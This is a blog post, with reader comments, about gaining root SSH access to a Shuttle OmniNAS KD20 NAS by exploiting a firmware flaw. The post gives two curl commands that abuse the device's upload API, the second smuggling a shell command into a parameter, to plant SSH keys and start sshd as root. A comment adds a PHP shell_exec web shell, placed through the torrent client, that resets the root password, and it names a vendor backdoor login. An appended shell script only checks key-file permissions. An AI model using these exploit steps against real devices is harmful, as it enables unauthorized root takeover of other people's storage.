There's always time to play

Tuesday, February 17, 2015

Getting root SSH access on Shuttle OmniNAS KD20

In the previous post I detailed a security vulnerability in the firmware for the Shuttle OmniNAS KD20. In an attempt to remedy Samba bug #10584 I was trying to get more direct access to my OmniNAS. I already tried to start sshd and telnetd, but with no real success (they were running, logging in was a problem though).

I wanted to get in without making too many changes, by putting an SSH public key on the share and pointing SSHD to it. But since that didn't work out I copied /etc/passwd to the disk share and cat-ed it back (using tee as well) with my user's shell set to /bin/ash. That allowed me to log in after starting sshd, but adding my account to /etc/sudoers was required to get to the next level of control.

Once I was in and with root permissions I was able to diagnose why my initial attempt didn't work. A simple sshd -p 8022 -d showed me that there was a permissions 'problem', because SSHD is secure by default and ignores authorized keys with write permissions for other users. An additional chmod fixed that as well, which brings me to the following two lines to accomplish root SSH access to the Shuttle OmniNAS KD20:

curl -F 'userfile=@.ssh/;' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload'

curl -F 'userfile=@/dev/null;filename=test.txt' 'http://192.168.x.x/filesystem/api-1.0/dir_action.php?type=upload&p=%24('

In the above two lines the first line copies to the disk share, the second line copies it to /root/.ssh/authorized_keys, sets permissions that are acceptable for SSHD and starts sshd.

Now all you need to do is ssh root@192.168.x.x and you're in!

Happy hacking!
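
The permission rule that blocked the first attempt can be checked before starting sshd. The script below is an added example, not part of the original post: it approximates sshd's StrictModes check, where the key file and every parent directory up to the home directory must be owned by the user or root and must not be writable by group or others. The function names and the throwaway sample directory are illustrative, and it assumes a GNU or BusyBox stat with the -c option.

```shell
#!/bin/sh
# Added example (not from the original post): approximates sshd's StrictModes
# check on an authorized_keys file. Assumes GNU or BusyBox stat (-c option).

# check_one PATH UID: PATH must be owned by UID or root and must not be
# writable by group or others (mode & 022 must be 0).
check_one() {
    info=$(stat -c '%a %u' "$1" 2>/dev/null) || { echo "cannot stat $1"; return 1; }
    mode=${info% *}; owner=${info#* }
    if [ "$owner" != "$2" ] && [ "$owner" != 0 ]; then
        echo "bad owner (uid $owner): $1"; return 1
    fi
    if [ $(( 0$mode & 022 )) -ne 0 ]; then
        echo "bad mode ($mode): $1"; return 1
    fi
}

# strict_modes_ok KEYFILE HOME UID: check the key file, then every parent
# directory up to and including HOME, before the keys would be trusted.
strict_modes_ok() {
    keyfile=$1; home=${2%/}; uid=$3
    [ -f "$keyfile" ] || { echo "not a regular file: $keyfile"; return 1; }
    check_one "$keyfile" "$uid" || return 1
    dir=$(dirname "$keyfile")
    while :; do
        check_one "$dir" "$uid" || return 1
        if [ "$dir" = "$home" ] || [ "$dir" = / ]; then break; fi
        dir=$(dirname "$dir")
    done
}

# Constructed sample: a throwaway home directory whose key file starts out
# world-writable, as a file copied from a shared volume might be.
demo() {
    h=$(mktemp -d) && mkdir -m 700 "$h/.ssh" || return 1
    echo 'ssh-ed25519 AAAA...constructed-placeholder demo@example' > "$h/.ssh/authorized_keys"
    chmod 666 "$h/.ssh/authorized_keys"
    strict_modes_ok "$h/.ssh/authorized_keys" "$h" "$(id -u)" || echo "-> keys ignored"
    chmod 600 "$h/.ssh/authorized_keys"
    strict_modes_ok "$h/.ssh/authorized_keys" "$h" "$(id -u)" && echo "-> keys accepted"
    rm -rf "$h"
}
demo
```

The same check fails when only a parent directory is too permissive, which is why a correct mode on the key file alone is not always enough.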


Sebastian Makowiecki said...

Every time after NAS is restarted the second command needs to be run again, otherwise the connection is refused. Can you point me in a direction so I could find out how to make these awesome changes permanent? Thanks in advance.

Sebastian Makowiecki said...

Ok I think I get it now, thanks for these instructions.

Sebastian Makowiecki said...

So just in case anyone is wondering how to start sshd at boot time.

First follow the instructions above to get root access to omninas.

Add a line:
/etc/rc.d/ start
to the file:

I have used vi for this purpose and added the line near the end of the file just before the last line "exit 0".
If you don't know how to use vi then find out before you use it because it might be tricky if you don't know how to.

Good luck.

Unknown said...

The first command simply says 'couldn't open file ".ssh/"'

Second command completes successfully. I try to ssh with root, it exchanges keys and asks for password. I don't know what the password is.

What am I doing wrong?

Michael Croes said...

Apparently you don't have an SSH public key. Be aware that responsibility is all yours.

Vlad Dascau said...

I have the same problem with ... Can you please help?

Lewzke said...

My method for rooting the KS10 is working nicely. I think it works with any Shuttle NAS with the latest firmwares too.

Here are the steps:

1. create a setroot.php file with this script:
*<*?*php print shell_exec("(echo \"foobar\nfoobar\n\" | sudo passwd root)"); *?*>*

I can't natively post this php file on this comment, please REMOVE THE STARS FROM THE BEGINNING AND AT THE END

2. Create a torrent with this setroot.php file
3. Add the torrent file to the NAS torrent client with the Transmission Remote GUI – Windows.
4. Remote GUI -> Change the location of the file with left click to the torrent, Set Data Location to usr/htdocs/admin/
5. run the php script opening from the browser: **omninas local ip**/admin/setroot.php
6. **omninas local ip**/admin/ssh.php -> enable SSH user:atonnas password:backdoor
7. connect to the SSH with putty, user: root password: foobar